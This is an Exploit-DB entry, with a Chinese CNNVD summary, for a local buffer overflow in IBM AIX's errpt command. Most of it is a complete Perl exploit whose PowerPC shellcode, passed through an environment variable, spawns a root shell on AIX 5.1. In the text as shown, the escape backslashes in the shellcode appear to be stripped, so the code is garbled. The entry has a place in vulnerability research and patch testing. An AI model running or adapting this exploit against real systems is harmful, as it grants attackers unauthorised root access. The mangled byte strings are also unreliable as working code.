https://www.exploit-db.com/exploits/21904
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200304-131

AIX4.3.3版本的errpt存在缓冲区溢出漏洞。本地用户以根权限执行任意代码。

source: http://www.securityfocus.com/bid/5885/info

The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges.

#!/usr/bin/perl
# FileName: x_errpt_aix5.pl
# Exploit command errpt for Aix5L to get a root shell.
# Tested  : on Aix5.1
# Author  : [email protected]
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-4-16
# Announce: use as your owner risk!

$BUFF="A". "x7cxa5x2ax79"x500;

#shellcode from lsd-pl and modified by watercloud 2003-4 for Aix5L
$BUFF.="x7ex94xa2x79x40x82xffxfdx7exa8x02xa6x3axb5x01x40";
$BUFF.="x88x55xfexe0x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
$BUFF.="x4cxc6x33x42x44xffxffx02xb6x05xffxffx7ex94xa2x79";
$BUFF.="x7ex84xa3x78x40x82xffxfdx7exa8x02xa6x3axb5x01x40";
$BUFF.="x88x55xfexe0x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
$BUFF.="x4cxc6x33x42x44xffxffx02xb7x05xffxffx38x75xffx04";
$BUFF.="x38x95xffx0cx7ex85xa3x78x90x75xffx0cx92x95xffx10";
$BUFF.="x88x55xfexe1x9ax95xffx0bx4bxffxffxd8/bin/sh";

%ENV=(); $ENV{CC}=$BUFF;

exec "/usr/bin/errpt","-T","A"."x2fxf2x2ax40"x1320;
#EOF

来源:AIXAPAR
名称:IY31997
链接:http://archives.neohapsis.com/archives/aix/2002-q3/0007.html
来源:BID
名称:5885
链接:http://www.securityfocus.com/bid/5885